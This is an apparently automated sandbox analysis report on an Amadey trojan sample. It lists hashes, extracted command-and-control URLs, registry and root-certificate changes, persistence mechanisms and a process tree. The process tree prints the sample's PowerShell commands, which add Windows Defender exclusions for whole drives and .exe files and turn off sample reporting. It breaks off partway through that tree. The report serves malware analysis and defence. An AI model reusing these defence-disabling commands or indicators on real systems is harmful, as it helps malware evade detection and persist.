amadey | 974a488f846e09b83c1ce8224d649e229561e6f022d31ff01a6438ccb1e26f8b

Resubmissions

20-03-2023 09:26

230320-lekscscg39 10

Analysis

max time kernel
147s
max time network
135s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
20-03-2023 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

99cb969e-5c61-4204-9902-f21da96b8e7a.exe
Size

113KB
MD5

86dc268e1263407b2a5a1a8f874d282a
SHA1

a4f0cef3711c85a65c43b27025bf373f10a84845
SHA256

974a488f846e09b83c1ce8224d649e229561e6f022d31ff01a6438ccb1e26f8b
SHA512

e792c226f23a04b692bb378ea3da6f5fbe6789e213e46c8316d6f684df7d5f28796f7e20300c8de853455d0a1bcce27ee0191ccc716195fef2717b20272845a6
SSDEEP

1536:Wurgu5SIr4FidRnablY5Rh+iqBUQMdzb:Wur9kuPnablIp6hi

Score

10^/10

amadey evasion trojan

Malware Config

Extracted

Family

amadey

Version

3.68

nestleservers.xyz/so57Nst/index.php

nestlehosts.xyz/so57Nst/index.php

nestlecareers.cf/so57Nst/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

WinUIUpdate.exepowershell.EXE

description	pid	Process	procid_target
PID 804 created 1308	804	WinUIUpdate.exe	18
PID 804 created 1308	804	WinUIUpdate.exe	18
PID 804 created 1308	804	WinUIUpdate.exe	18
PID 804 created 1308	804	WinUIUpdate.exe	18
PID 804 created 1308	804	WinUIUpdate.exe	18
PID 1932 created 416	1932	powershell.EXE	3

Drops file in Drivers directory 1 IoCs

Processes:

WinUIUpdate.exe

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	WinUIUpdate.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 2 IoCs

Processes:

WeatherApp.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WeatherApp.exe	WeatherApp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WeatherApp.exe	WeatherApp.exe

Executes dropped EXE 3 IoCs

Processes:

WeatherApp.exeWeatherApp.exeWinUIUpdate.exe

pid	Process
2000	WeatherApp.exe
1456	WeatherApp.exe
804	WinUIUpdate.exe

Loads dropped DLL 3 IoCs

Processes:

99cb969e-5c61-4204-9902-f21da96b8e7a.exeWeatherApp.exeWeatherApp.exe

pid	Process
816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe
2000	WeatherApp.exe
1456	WeatherApp.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.EXE

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

WeatherApp.exeWinUIUpdate.exepowershell.EXE

description	pid	Process	procid_target
PID 2000 set thread context of 1456	2000	WeatherApp.exe	30
PID 804 set thread context of 1872	804	WinUIUpdate.exe	72
PID 1932 set thread context of 812	1932	powershell.EXE	79

Drops file in Program Files directory 1 IoCs

Processes:

WinUIUpdate.exe

description	ioc	Process
File created	C:\Program Files\Google\Chrome\chromeupdater.exe	WinUIUpdate.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid	Process
1232	sc.exe
896	sc.exe
1960	sc.exe
1408	sc.exe
612	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exe

pid	Process
748	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0689e4c0e5bd901	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WeatherApp.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	WeatherApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	WeatherApp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WeatherApp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WeatherApp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	WeatherApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	WeatherApp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeWeatherApp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWinUIUpdate.exepowershell.exepowershell.exepowershell.EXEpowershell.EXE

pid	Process
2012	powershell.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
2000	WeatherApp.exe
1976	powershell.exe
1696	powershell.exe
1860	powershell.exe
1800	powershell.exe
1948	powershell.exe
768	powershell.exe
1296	powershell.exe
268	powershell.exe
1992	powershell.exe
880	powershell.exe
1972	powershell.exe
1224	powershell.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
1716	powershell.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
108	powershell.exe
804	WinUIUpdate.exe
804	WinUIUpdate.exe
564	powershell.EXE
1932	powershell.EXE

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exeWeatherApp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exe

description	pid	Process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2000	WeatherApp.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeShutdownPrivilege	844	powercfg.exe
Token: SeShutdownPrivilege	268	powercfg.exe
Token: SeShutdownPrivilege	524	powercfg.exe
Token: SeShutdownPrivilege	1896	powercfg.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	564	powershell.EXE
Token: SeDebugPrivilege	1932	powershell.EXE
Token: SeDebugPrivilege	1932	powershell.EXE
Token: SeDebugPrivilege	812	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

99cb969e-5c61-4204-9902-f21da96b8e7a.exeWeatherApp.exeWeatherApp.execmd.execmd.exe

description	pid	Process	procid_target
PID 816 wrote to memory of 2012	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	27
PID 816 wrote to memory of 2012	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	27
PID 816 wrote to memory of 2012	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	27
PID 816 wrote to memory of 2012	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	27
PID 816 wrote to memory of 2000	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	29
PID 816 wrote to memory of 2000	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	29
PID 816 wrote to memory of 2000	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	29
PID 816 wrote to memory of 2000	816	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	29
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 2000 wrote to memory of 1456	2000	WeatherApp.exe	30
PID 1456 wrote to memory of 604	1456	WeatherApp.exe	33
PID 1456 wrote to memory of 604	1456	WeatherApp.exe	33
PID 1456 wrote to memory of 604	1456	WeatherApp.exe	33
PID 1456 wrote to memory of 604	1456	WeatherApp.exe	33
PID 604 wrote to memory of 1976	604	cmd.exe	35
PID 604 wrote to memory of 1976	604	cmd.exe	35
PID 604 wrote to memory of 1976	604	cmd.exe	35
PID 604 wrote to memory of 1976	604	cmd.exe	35
PID 604 wrote to memory of 1696	604	cmd.exe	36
PID 604 wrote to memory of 1696	604	cmd.exe	36
PID 604 wrote to memory of 1696	604	cmd.exe	36
PID 604 wrote to memory of 1696	604	cmd.exe	36
PID 1456 wrote to memory of 1728	1456	WeatherApp.exe	37
PID 1456 wrote to memory of 1728	1456	WeatherApp.exe	37
PID 1456 wrote to memory of 1728	1456	WeatherApp.exe	37
PID 1456 wrote to memory of 1728	1456	WeatherApp.exe	37
PID 1728 wrote to memory of 1860	1728	cmd.exe	39
PID 1728 wrote to memory of 1860	1728	cmd.exe	39
PID 1728 wrote to memory of 1860	1728	cmd.exe	39
PID 1728 wrote to memory of 1860	1728	cmd.exe	39
PID 1728 wrote to memory of 1800	1728	cmd.exe	40
PID 1728 wrote to memory of 1800	1728	cmd.exe	40
PID 1728 wrote to memory of 1800	1728	cmd.exe	40
PID 1728 wrote to memory of 1800	1728	cmd.exe	40
PID 604 wrote to memory of 1948	604	cmd.exe	41
PID 604 wrote to memory of 1948	604	cmd.exe	41
PID 604 wrote to memory of 1948	604	cmd.exe	41
PID 604 wrote to memory of 1948	604	cmd.exe	41
PID 1728 wrote to memory of 1296	1728	cmd.exe	42
PID 1728 wrote to memory of 1296	1728	cmd.exe	42
PID 1728 wrote to memory of 1296	1728	cmd.exe	42
PID 1728 wrote to memory of 1296	1728	cmd.exe	42
PID 604 wrote to memory of 768	604	cmd.exe	43
PID 604 wrote to memory of 768	604	cmd.exe	43
PID 604 wrote to memory of 768	604	cmd.exe	43
PID 604 wrote to memory of 768	604	cmd.exe	43
PID 604 wrote to memory of 1992	604	cmd.exe	44
PID 604 wrote to memory of 1992	604	cmd.exe	44
PID 604 wrote to memory of 1992	604	cmd.exe	44
PID 604 wrote to memory of 1992	604	cmd.exe	44
PID 1728 wrote to memory of 268	1728	cmd.exe	45
PID 1728 wrote to memory of 268	1728	cmd.exe	45
PID 1728 wrote to memory of 268	1728	cmd.exe	45
PID 1728 wrote to memory of 268	1728	cmd.exe	45
PID 1456 wrote to memory of 804	1456	WeatherApp.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{15161c43-1d12-434d-85df-cb2d4b3c837d}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:812

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1308
- C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe
  "C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
    "C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
      "C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:1456
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:604
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath "C:"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionExtension exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Set-MpPreference -MAPSReporting Disable
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\1000157020\test.cmd" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1728
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath "C:"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionExtension exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Set-MpPreference -MAPSReporting Disable
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
